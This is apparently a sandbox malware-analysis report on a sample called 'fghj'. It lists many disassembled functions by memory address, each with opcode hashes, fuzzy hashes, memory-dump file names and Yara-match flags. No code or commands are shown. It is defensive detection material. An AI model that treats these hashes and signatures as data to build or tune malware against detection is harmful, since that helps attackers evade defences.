                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                    • Opcode ID: 7226f1894162a06b9b1387c3496a955569d99e600cb79f6b4c702f34ddccb085
                                                                                                                                                                                                                    • Instruction ID: c6e868f6945d4b92c28bf4b43908449ab4bbfad747b4cb7e2841ff2bc20652b1
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 7226f1894162a06b9b1387c3496a955569d99e600cb79f6b4c702f34ddccb085
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 82F1AA356487418FC724CF29C880A6BFBE6EFD9300F08896DE5D987791E675E844CB92
                                                                                                                                                                                                                    Function 00B4B499 Relevance: .4, Instructions: 429COMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000000.00000002.1613713857.0000000000B00000.00000040.00001000.00020000.00000000.sdmp, Offset: 00B00000, based on PE: false
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_b00000_fghj.jbxd
                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                    • Opcode ID: 3f25aa825a39bec38ad6b6d36dd1a7b58a115f37f7b46c95bc86c5f4f7415b87
                                                                                                                                                                                                                    • Instruction ID: 813574d9931380f4f30ee143f24a52041c5ebef2d2e94fef9e002a8bda0b077a
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 3f25aa825a39bec38ad6b6d36dd1a7b58a115f37f7b46c95bc86c5f4f7415b87
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 37D17931718B498BDB29DF68D899BAEB7E5FB58705F00422DE95BC3240DF30EA158781
                                                                                                                                                                                                                    Function 00B4C75D Relevance: .4, Instructions: 409COMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000000.00000002.1613713857.0000000000B00000.00000040.00001000.00020000.00000000.sdmp, Offset: 00B00000, based on PE: false
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_b00000_fghj.jbxd
                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                    • Opcode ID: 3e74d2aa687a79bc353c1e30e2761018af6d861ea5a8c8f1c92844b65f1d9ba9
                                                                                                                                                                                                                    • Instruction ID: 22b88d2e7ced6fb94fd9168154ea4ecfc7673c6dedc2739832f29c400636bea7
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 3e74d2aa687a79bc353c1e30e2761018af6d861ea5a8c8f1c92844b65f1d9ba9
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: CAD13E31518A0C8FDB59EF28D8896EA77E1FF98700F14466DE88AC7255DF30E945CB82
                                                                                                                                                                                                                    Function 00B1725C Relevance: .4, Instructions: 407COMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000000.00000002.1613713857.0000000000B00000.00000040.00001000.00020000.00000000.sdmp, Offset: 00B00000, based on PE: false
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_b00000_fghj.jbxd
                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                    • Opcode ID: d04de7a720be330c13c89747f3e6a9187e593b03a6041be1e830e2687060563f
                                                                                                                                                                                                                    • Instruction ID: c4aa22af6daa484a7306609112dfcb176fb51b19f227793f7f8749639b06b85d
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: d04de7a720be330c13c89747f3e6a9187e593b03a6041be1e830e2687060563f
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: FBD14FB4800B00ABD760EF39C947697BEF4FB06310F544A5DE8EA8B695E730A455CBD2
                                                                                                                                                                                                                    Function 00B00000 Relevance: .4, Instructions: 395COMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000000.00000002.1613713857.0000000000B00000.00000040.00001000.00020000.00000000.sdmp, Offset: 00B00000, based on PE: false
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_b00000_fghj.jbxd
                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                    • Opcode ID: 65b9c824dc7e9aa9eb4a54a5d51634020e7d915bc63c801f910d7bc8e9282aa7
                                                                                                                                                                                                                    • Instruction ID: ed369054b5c57294e26dc9579accbf618aca36bc4135aaa6a08626de5935127e
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 65b9c824dc7e9aa9eb4a54a5d51634020e7d915bc63c801f910d7bc8e9282aa7
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 05C139B6E113384FEB18CEB9DC993AD7562F780304F86926DD546DB289CB3809874BC5
                                                                                                                                                                                                                    Function 00B4C38D Relevance: .4, Instructions: 380COMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000000.00000002.1613713857.0000000000B00000.00000040.00001000.00020000.00000000.sdmp, Offset: 00B00000, based on PE: false
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_b00000_fghj.jbxd
                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                    • Opcode ID: e45004cfa00b96cc07e21d80348e0ecc464919f4c4bc6f170ace2c42d415ba2b
                                                                                                                                                                                                                    • Instruction ID: 725f86602b3343147f16d63b78efd4ae0344a754126ba144b594fb4b69d07411
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: e45004cfa00b96cc07e21d80348e0ecc464919f4c4bc6f170ace2c42d415ba2b
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 6AB1C730315E095BCB99EF28C8D57BAB7D1FB98700F1452AAD44AC7245DF34EA02DB81
                                                                                                                                                                                                                    Function 003A7A3B Relevance: .4, Instructions: 374COMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000000.00000002.1613368173.00000000003A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003A0000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000000.00000002.1613350160.00000000003A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000000.00000002.1613385259.00000000003AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000000.00000002.1613401600.00000000003AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000000.00000002.1613417554.00000000003AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_3a0000_fghj.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                    • Opcode ID: 6a572651d3e838e9c482ac4ab1b45b657e878e4f0661892e65a1c2023fa599b9
                                                                                                                                                                                                                    • Instruction ID: f952fdd0e0266490ae90114c0451ef1ad01a740f310c58eac8694629f1c35b32
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 6a572651d3e838e9c482ac4ab1b45b657e878e4f0661892e65a1c2023fa599b9
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: C6D1E137D503258FC74BEF79EC9656A376AFB93305B46862EE442CB1A5DB3841018BC1
                                                                                                                                                                                                                    Function 003A70B2 Relevance: .4, Instructions: 373COMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000000.00000002.1613368173.00000000003A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003A0000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000000.00000002.1613350160.00000000003A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000000.00000002.1613385259.00000000003AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000000.00000002.1613401600.00000000003AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000000.00000002.1613417554.00000000003AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_3a0000_fghj.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                    • Opcode ID: 001df026813056d972c9b2727f01c25d8a13beb559e0f9ac56d93e9613c16ce9
                                                                                                                                                                                                                    • Instruction ID: 88f639945868a119ed0baa7023d0d7e13592b88f173acfe7ee17203d651b761c
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 001df026813056d972c9b2727f01c25d8a13beb559e0f9ac56d93e9613c16ce9
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 57C124379107258FC74BEF79EC9A52A376AFB93304B468639E512CF126CF3851428B81
                                                                                                                                                                                                                    Function 00B1EF95 Relevance: .3, Instructions: 337COMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000000.00000002.1613713857.0000000000B00000.00000040.00001000.00020000.00000000.sdmp, Offset: 00B00000, based on PE: false
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_b00000_fghj.jbxd
                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                    • Opcode ID: 3798b5006689c83b40be42f7250d8f90620031f940ce02008526c01b175d592e
                                                                                                                                                                                                                    • Instruction ID: 4f2bf5857f1d26d098acd7be3e067c9c988bd9ce82a0515c920a4f2ef08fbd97
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 3798b5006689c83b40be42f7250d8f90620031f940ce02008526c01b175d592e
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 87B13571904302AFE7109F24CC41B6ABBE1FFE5760F544A7CF8A8A72A0DB329954DB41
                                                                                                                                                                                                                    Function 00B3F4C5 Relevance: .3, Instructions: 330COMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000000.00000002.1613713857.0000000000B00000.00000040.00001000.00020000.00000000.sdmp, Offset: 00B00000, based on PE: false
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_b00000_fghj.jbxd
                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                    • Opcode ID: 7b47b6d351d673aad859ac044ac8d2bbea2ba8776ed6e2ba0e794b8750c88311
                                                                                                                                                                                                                    • Instruction ID: fb5bc0fb089ebe8e784d63540d47cbfbc5e75bf69f0a80f0b849bcc83e804579
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 7b47b6d351d673aad859ac044ac8d2bbea2ba8776ed6e2ba0e794b8750c88311
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: A9A10435F083229BC724CF28C89163BB7E2EB99354F25857CE98697351EB35AC01D781
                                                                                                                                                                                                                    Function 00B1A545 Relevance: .3, Instructions: 320COMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000000.00000002.1613713857.0000000000B00000.00000040.00001000.00020000.00000000.sdmp, Offset: 00B00000, based on PE: false
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_b00000_fghj.jbxd
                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                    • Opcode ID: cee491e2378f392d6e5ec72cbda6aaa2df5c91471672a462ee4414207a6eabf3
                                                                                                                                                                                                                    • Instruction ID: e9d00c1ff82c8a8c8d0b7810c953a107850791f0368e88ea1aff1a27f230b511
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: cee491e2378f392d6e5ec72cbda6aaa2df5c91471672a462ee4414207a6eabf3
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 56A103746017128FC724CF2AC890AA2B3F2FF95310749D99DD4868BBA4EB74F955CB05
                                                                                                                                                                                                                    Function 00B3F185 Relevance: .3, Instructions: 317COMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000000.00000002.1613713857.0000000000B00000.00000040.00001000.00020000.00000000.sdmp, Offset: 00B00000, based on PE: false
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_b00000_fghj.jbxd
                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                    • Opcode ID: e2fbc275661ca040c73beed2e01dec4aed27e74fb92f7c2a29142cf2f222813a
                                                                                                                                                                                                                    • Instruction ID: b1c21fb965f0f8e55d19b4245c688a23fe57efea379c2dbb5b4646339a506344
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: e2fbc275661ca040c73beed2e01dec4aed27e74fb92f7c2a29142cf2f222813a
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 9D91CF75A043129BD718DF18C890A3BB3E2EFD9750F2684BDE9858B351EB30DC018B46
                                                                                                                                                                                                                    Function 00B07A95 Relevance: .3, Instructions: 303COMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000000.00000002.1613713857.0000000000B00000.00000040.00001000.00020000.00000000.sdmp, Offset: 00B00000, based on PE: false
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_b00000_fghj.jbxd
                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                    • Opcode ID: 192b9d08ce17bc1d312091997c30b37e60dce660e4c0c653e6da0c20b7bf1f23
                                                                                                                                                                                                                    • Instruction ID: 4a30319a2b7d49bae58e6b0db02451b0c080c1ddc62ee4ae28fe437f3b006589
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 192b9d08ce17bc1d312091997c30b37e60dce660e4c0c653e6da0c20b7bf1f23
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 1BC15EB19487418FC370CF68CC86BABBBE1EF85318F08496DD199C6242DB74A155CB46
                                                                                                                                                                                                                    Function 00B3EE85 Relevance: .3, Instructions: 299COMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000000.00000002.1613713857.0000000000B00000.00000040.00001000.00020000.00000000.sdmp, Offset: 00B00000, based on PE: false
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_b00000_fghj.jbxd
                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                    • Opcode ID: c830f3bc971f2dc289cfec64c6282a5d258ba2b9d10eccf1a99ee1d7637492a1
                                                                                                                                                                                                                    • Instruction ID: c925c3e3ee906797a0b4baffbac39e6973f4087f7417f319aa1a34a8ba306670
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: c830f3bc971f2dc289cfec64c6282a5d258ba2b9d10eccf1a99ee1d7637492a1
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: A7713636A043129BEB289F18DC5163FB7E2EBD5750F2A80BDE88597391EA70DC019745
                                                                                                                                                                                                                    Function 00B379F5 Relevance: .3, Instructions: 284COMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000000.00000002.1613713857.0000000000B00000.00000040.00001000.00020000.00000000.sdmp, Offset: 00B00000, based on PE: false
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_b00000_fghj.jbxd
                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                    • Opcode ID: cf8dc68b36bc545b02ceeca952c5933d394ca7744a93c9696f65566a837762a0
                                                                                                                                                                                                                    • Instruction ID: 421b8f3413e2111212395ee72191aef1b09fba2e1bb40671a4f4ae2f04e82abc
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: cf8dc68b36bc545b02ceeca952c5933d394ca7744a93c9696f65566a837762a0
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: F2B14DB2A482518FCB24CB7CC8913AEBFF1EB45320F3986ADD5A6973D1DA358901C741
                                                                                                                                                                                                                    Function 00B4D635 Relevance: .3, Instructions: 283COMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000000.00000002.1613713857.0000000000B00000.00000040.00001000.00020000.00000000.sdmp, Offset: 00B00000, based on PE: false
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_b00000_fghj.jbxd
                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                    • Opcode ID: e2e903f92329977da97ab707699d6460e74b4fcfb6d1b984767a57618237eb95
                                                                                                                                                                                                                    • Instruction ID: 9e8e5e823cb440047cb9928bd4cb5553d588c9001598186ab7ade0808859517e
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: e2e903f92329977da97ab707699d6460e74b4fcfb6d1b984767a57618237eb95
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: C0A11E71508A4C8FDB55EF28C889BEA77F5FB68315F10466EE84AC7161EB30D644CB81
                                                                                                                                                                                                                    Function 00B27425 Relevance: .3, Instructions: 270COMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000000.00000002.1613713857.0000000000B00000.00000040.00001000.00020000.00000000.sdmp, Offset: 00B00000, based on PE: false
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_b00000_fghj.jbxd
                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                    • Opcode ID: d230b6c6d2cff8e2467bddc0d81501fe8c6a91f5f1863f6afdd41d9f0fa6c6d6
                                                                                                                                                                                                                    • Instruction ID: 4b3e62ccc51e098a4bd7bd28372976338cb9d0b2129353d2f931560dd98b3bac
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: d230b6c6d2cff8e2467bddc0d81501fe8c6a91f5f1863f6afdd41d9f0fa6c6d6
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 59717E706483304BD7249F74EC92B7BB7E2EF92310F2895ACE44A87391DA38DC05875A
                                                                                                                                                                                                                    Function 00B0A835 Relevance: .3, Instructions: 261COMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000000.00000002.1613713857.0000000000B00000.00000040.00001000.00020000.00000000.sdmp, Offset: 00B00000, based on PE: false
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_b00000_fghj.jbxd
                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                    • Opcode ID: 4096acb2ab4c3ad1524ac0ac03abea4a635bfb9afef969303e015a68bf910e18
                                                                                                                                                                                                                    • Instruction ID: 051d93ba8c1ff8834d9b345a9b14ecf99170190636eb5c9aa3d43031d72092e4
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 4096acb2ab4c3ad1524ac0ac03abea4a635bfb9afef969303e015a68bf910e18
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: A571E76164C3C28EC3159F3985A136BFFE0EFA3210F189AADE4D15B2C2D6358509D767
                                                                                                                                                                                                                    Function 00B19A09 Relevance: .3, Instructions: 255COMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000000.00000002.1613713857.0000000000B00000.00000040.00001000.00020000.00000000.sdmp, Offset: 00B00000, based on PE: false
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_b00000_fghj.jbxd
                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                    • Opcode ID: 5d26f98bc6d0a8a982f4150623f8eabfc4a874e99f09cf751038908c93121c66
                                                                                                                                                                                                                    • Instruction ID: 32ba21b640ab1168c4e79025b08ec16827363f6ffc86c1940a9fa7780869d94a
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 5d26f98bc6d0a8a982f4150623f8eabfc4a874e99f09cf751038908c93121c66
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: A771E1342146808FD725CF24C9E1AB7BBE2EF56300F65D4ACD49B47266D731EC859B10
                                                                                                                                                                                                                    Function 00B28875 Relevance: .3, Instructions: 253COMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000000.00000002.1613713857.0000000000B00000.00000040.00001000.00020000.00000000.sdmp, Offset: 00B00000, based on PE: false
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_b00000_fghj.jbxd
                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                    • Opcode ID: 0e23c23e70ddf1e928da21470013aecfe84afacb7d0810a6fe789d0582faa3f5
                                                                                                                                                                                                                    • Instruction ID: e54a08f35f54049a31cbe52ac48138621206f2e2bfa62c2f6721e3e155b0efb5
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 0e23c23e70ddf1e928da21470013aecfe84afacb7d0810a6fe789d0582faa3f5
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 6471A377F105168FCB18CE78D8512AEB6F2BBC9310B598578D42AEB385E630DD528B80
                                                                                                                                                                                                                    Function 00B3AD95 Relevance: .3, Instructions: 251COMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000000.00000002.1613713857.0000000000B00000.00000040.00001000.00020000.00000000.sdmp, Offset: 00B00000, based on PE: false
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_b00000_fghj.jbxd
                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                    • Opcode ID: f87e01e82d0f6fb418c8f131ee03dde787c11305f1a16f72ff2184a5f7a8fa95
                                                                                                                                                                                                                    • Instruction ID: 8664072f973742f04ae2036f48b8de7d1b785f99f0d4212180f9080e52effc5e
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: f87e01e82d0f6fb418c8f131ee03dde787c11305f1a16f72ff2184a5f7a8fa95
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 095156717082204FD7289F28C891A7BB7D2EBD5714F39C67DE8D59B385DA319C028B92
                                                                                                                                                                                                                    Function 00B1F3A5 Relevance: .2, Instructions: 222COMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000000.00000002.1613713857.0000000000B00000.00000040.00001000.00020000.00000000.sdmp, Offset: 00B00000, based on PE: false
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_b00000_fghj.jbxd
                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                    • Opcode ID: 6ccd4ae95381feddb7528fe9b073f43434436dfc8b6581e67265f945c737168a
                                                                                                                                                                                                                    • Instruction ID: 0f6a899940b715bc6d3c14b219507d05f8ab9785208d4ca02df9bd50d664582a
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 6ccd4ae95381feddb7528fe9b073f43434436dfc8b6581e67265f945c737168a
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: DD712426B09AC24BD328893C5C612BABED34BD6234F6CC7BDE5F5873E5C6698845C341
                                                                                                                                                                                                                    Function 00B239B5 Relevance: .2, Instructions: 214COMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000000.00000002.1613713857.0000000000B00000.00000040.00001000.00020000.00000000.sdmp, Offset: 00B00000, based on PE: false
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_b00000_fghj.jbxd
                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                    • Opcode ID: c47b421d70071277d192bd0bc7114b5f7e38843b6dc84b61bca17bf4976ac9fb
                                                                                                                                                                                                                    • Instruction ID: 31192f2ee933cb526554dad57878bfb28be29a094356e30e46fc4599a430a95f
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: c47b421d70071277d192bd0bc7114b5f7e38843b6dc84b61bca17bf4976ac9fb
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 8751D5A15043248BD7209F28EC9267773F4EF56764F0985A9E8DA87391F378DE05C722
                                                                                                                                                                                                                    Function 00B30C45 Relevance: .2, Instructions: 212COMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000000.00000002.1613713857.0000000000B00000.00000040.00001000.00020000.00000000.sdmp, Offset: 00B00000, based on PE: false
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_b00000_fghj.jbxd
                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                    • Opcode ID: 448e38da1af34a2956f60fa2a11141aa57d259a228dfbd4a8eb9467670502620
